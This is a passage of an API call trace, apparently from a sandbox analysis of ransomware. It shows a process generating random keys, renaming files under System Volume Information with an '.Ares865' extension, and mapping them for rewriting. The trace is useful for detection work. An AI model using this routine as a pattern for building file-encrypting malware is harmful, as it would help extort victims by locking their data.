phProv=0x2ccce04*=0x2f0518) returned 1 [0112.945] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.945] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.946] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.Ares865") returned 111 [0112.946] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0112.949] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.949] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0112.949] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.950] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.950] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.950] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0112.955] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0112.960] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.960] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.960] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.961] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.Ares865") returned 111 [0112.962] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0112.963] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.963] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=432) returned 1 [0112.964] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.964] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.964] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.965] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x170 [0112.967] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x190000 [0112.968] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.968] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.968] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.969] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.Ares865") returned 111 [0112.969] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{7a521dbe-9658-44e5-843c-29dd5c50d136}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{7a521dbe-9658-44e5-843c-29dd5c50d136}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0112.971] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{7a521dbe-9658-44e5-843c-29dd5c50d136}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.971] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0112.971] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.972] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.972] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.972] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0112.975] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0112.979] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.980] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.980] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.981] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.Ares865") returned 111 [0112.981] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{7a521dbe-9658-44e5-843c-29dd5c50d136}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{7a521dbe-9658-44e5-843c-29dd5c50d136}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0112.982] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{7a521dbe-9658-44e5-843c-29dd5c50d136}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.982] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=432) returned 1 [0112.982] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.983] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.983] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.983] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x170 [0112.986] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x190000 [0112.987] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.987] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.988] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.988] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.Ares865") returned 111 [0112.988] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{8000ffcd-1da9-461e-a8a6-b9c248869570}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{8000ffcd-1da9-461e-a8a6-b9c248869570}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0112.989] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{8000ffcd-1da9-461e-a8a6-b9c248869570}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.989] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0112.989] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.990] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.990] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.990] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0112.992] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0112.997] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.998] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.998] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.999] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.Ares865") returned 111 [0112.999] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{8000ffcd-1da9-461e-a8a6-b9c248869570}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{8000ffcd-1da9-461e-a8a6-b9c248869570}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0113.000] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{8000ffcd-1da9-461e-a8a6-b9c248869570}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.000] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0113.001] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.001] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.001] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.002] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x170 [0113.005] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0113.006] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.006] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.006] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.007] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.Ares865") returned 111 [0113.007] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{8002c55b-b05c-402e-b80d-41cead61f984}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{8002c55b-b05c-402e-b80d-41cead61f984}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0113.008] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{8002c55b-b05c-402e-b80d-41cead61f984}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.008] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0113.008] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.009] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.009] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.009] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0113.010] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0113.016] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.016] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.016] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.018] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.Ares865") returned 111 [0113.018] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{8002c55b-b05c-402e-b80d-41cead61f984}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{8002c55b-b05c-402e-b80d-41cead61f984}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0113.019] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{8002c55b-b05c-402e-b80d-41cead61f984}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.019] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=432) returned 1 [0113.019] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.020] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.020] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.020] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x170 [0113.024] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x190000 [0113.024] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.025] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.025] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.026] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.Ares865") returned 111 [0113.026] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{9069688d-befb-4294-b8a6-15447e1f812d}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{9069688d-befb-4294-b8a6-15447e1f812d}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0113.027] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{9069688d-befb-4294-b8a6-15447e1f812d}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.027] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0113.028] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.028] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.028] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.029] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0113.030] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0113.035] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.036] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.036] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.037] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.Ares865") returned 111 [0113.037] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{9069688d-befb-4294-b8a6-15447e1f812d}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{9069688d-befb-4294-b8a6-15447e1f812d}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0113.038] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{9069688d-befb-4294-b8a6-15447e1f812d}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.038] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0113.039] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.039] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.039] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.040] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x170 [0113.042] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0113.043] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.044] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.044] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.044] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.Ares865") returned 111 [0113.044] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0113.050] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.051] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0113.051] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) 